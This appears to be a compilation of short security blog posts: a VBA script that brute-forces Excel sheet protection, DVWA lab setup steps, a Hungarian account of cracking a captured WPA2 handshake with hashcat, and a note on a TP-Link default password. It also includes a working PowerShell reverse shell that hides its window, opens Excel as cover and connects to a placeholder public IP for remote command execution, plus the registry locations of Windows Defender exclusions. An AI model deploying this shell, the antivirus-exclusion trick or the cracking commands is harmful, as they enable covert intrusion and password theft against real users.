Decrypt Excel Password

Put this code into VB, and run…

Sub PasswordBreaker()
 Dim i As Integer, j As Integer, k As Integer
 Dim l As Integer, m As Integer, n As Integer
 Dim i1 As Integer, i2 As Integer, i3 As Integer
 Dim i4 As Integer, i5 As Integer, i6 As Integer
 On Error Resume Next
 For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
 For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
 For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
 For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
 ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
 Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
 Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
 If ActiveSheet.ProtectContents = False Then
 MsgBox "One usable password is " & Chr(i) & Chr(j) & _
 Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
 Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
 Exit Sub
 End If
 Next: Next: Next: Next: Next: Next
 Next: Next: Next: Next: Next: Next
End Sub

How To Setup DVWA Using Windows XAMPP

Download and install XAMPP on your computer.

Download DVWA, then extract the zip file to the htdocs folder.

In \xampp\htdocs\dvwa\config directory rename config.inc.php.dist to config.inc.php, and search line

$_DVWA[ 'db_password' ] = 'p@ssw0rd';

and change to (empty password).

Edit \xampp\php\php.ini file, search line

allow_url_include=Off

and change to On.

Then open the XAMPP control panel and start “Apache” and “MySQL” service.

Open the web browser, then go 127.0.0.1/DVWA. Click on “Create/Reset Database” button in browser…

Go!

Powershell reverse shell example code

Add-Type -Name win -MemberDefinition ‘[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);’ -Namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle,0)
Invoke-Item “C:\Program Files\Microsoft Office\Office15\excel.exe”
Set-Location c:\windows\system32
$client = New-Object System.Net.Sockets.TCPClient(“public_IP”,public_port);
$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()

Of’course change the public_IP and public_port variable, and Invoke-Item application path!

How to Add or Remove Exclusions in registry for Windows Defender in Windows 10

Files and folders exclusions are stored in the registry key below.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

File types exclusions are stored in the registry key below.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions

Processes exclusions are stored in the registry key below.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes

Hashcat 3.x rule nem működik WPA2 törésnél?

Előzmény:

Tanulás, feladat: Adott egy ‘baráti’ WPA2 hálózat, elmentett HCPX file. Mivel a feladat a hashcat (rule-ok) gyakorlása, az SSD jelszó páros ismert. A capture folyamán az előkészítés is megtörtént, a fájl tartalmaz minden szükséges adatot.

Ami adott:

  • Hashcat 3.6
  • HCPX capture fájl
  • A jelszó egy magyar keresztnév, két számjeggyel kiegészítve, első betű nagybetű.

Első próbálkozás:

Crunch-al létrehozott rule fájl ($%$%), illetve a magyar keresztnevek becézett alakjainak wordlistje.

Parancs:

hashcat -a 0 -m 2500  Becenevek-BP.txt -r 11.rule

Hashcat pörög, majd pár másodperc múlva végez, közli hogy nem talált megfelelő jelszót:

Semmi gond, valami rossz a rule-ban, vagy pedig a wordlist-ben…

Többszöri próbálkozás, és erős emlegetése az ismert (később ismeretlenek is) vallások fel és lemenőinek után eljutottam oda, hogy a megkérdezzük a jelszót.

Oké, jelszó megvan (Henike95). A wordlist tartalmazza a ‘Henike’ szót, a rule pedig a ’95’ szabályt, így működnie kellene… Mondom kell!

Még egyszer…

Persze, így se jó.

Gondolkozás… (+1 kadarka)

Hashcat –stdout paraméterével legeneráltam a használt jelszavakat, hátha… Persze tartalmazta, ezzel nincs gond…

Többszöri próbálkozás után eljutottam oda hogy a wordlist csak a ‘Henike’ szót tartalmazza, a rule pedig a ‘$9$5’ szabályt…

Így se találja…

Ha kézzel beírom, vagy pedig direktben megadom a wordlistben a jelszót, akkor persze kipörgeti…

Oké, akkor valahol mégiscsak a rule megadás környéken lehet a gond.

Kínlódás: -j paraméter, -k paraméter (Tudom, de hátha…)

Ugyanaz…. 😦

+1 kadarka

Jó, nincs más hátra, olvassuk el a readme-ket.

WP2 spec…

RC4 spec…

Semmi különös, nincs ötlet…

Mégegyszer…

Ötlet: a WPA2 jelszó minimum hossza 8 karater… A Henike95 meg 8 hosszú, akkor ez jó…. (másként nem is lehetett volna megcsinálni a WPA2 AP-t…)

+1 kadarka

Hashcat kimenet hosszas, hozzáértő (gyk.: pixeleket már külön látod) bámulása…

HOPPÁ!

Hát mi ez istentelen nagy szám a Rejected után ? Mit dobál ez el?

Hashcat doksi olvasása…

Aham, tehát ami nem tetszik neki az adott algoritmushoz (gyk.: -m 2500) azt eldobja…

De miért dob el ennyit?

Pár újabb rule és wordlist teszt után kiderült, hogyha a wordlist-ben csak a Henike van, a rule-ban pedig csak a $9$5, akkor is eldobja… Mind az egyet…

Pár extra wordlist/rule páros, meg 1 kadarka után a következő derült ki:

A hashcat veszi az algoritmus paramétereit, ebből előállít egy szűkítést (ebben az esetben azt, hogy a jelszó NEM lehet 8 karakternél rövidebb).

A probléma az, hogy  a jelszó hosszát nem a rule-al kiegészítve nézi, hanem a kiinduló wordlist-ben előforduló szó hosszát.

Mivel a wordlistben a Henike szerepelt, ezért eldobta, mivel csak 6 karakter hosszú…

Ennyi…

hashcat32 --stdout -r 11.rule Becenevek-BP.txt | hashcat64 -a 0 -m 2500 wpa0701-01.hcpx

Működik, jelszó kipörgetve.

A wordlistben kiegészítve a szavakat minimum 8 karakterre, majd a ] parancsot megfelelő számban használva a rule-ban, szintén megfelelő eredmény érhetünk el…

 

 

TP-LINK WR702N Wi-Fi router default password

During the design phase someone had the forethought to make a WiFi AP password that isn’t merely a default. But that’s where this went off the rails. They did the next worst thing, which is to assign a password that gets broadcast publicly: the last eight characters of the MAC address. This will be unique for each device, but it is also promiscuously broadcast to any device that cares to listen.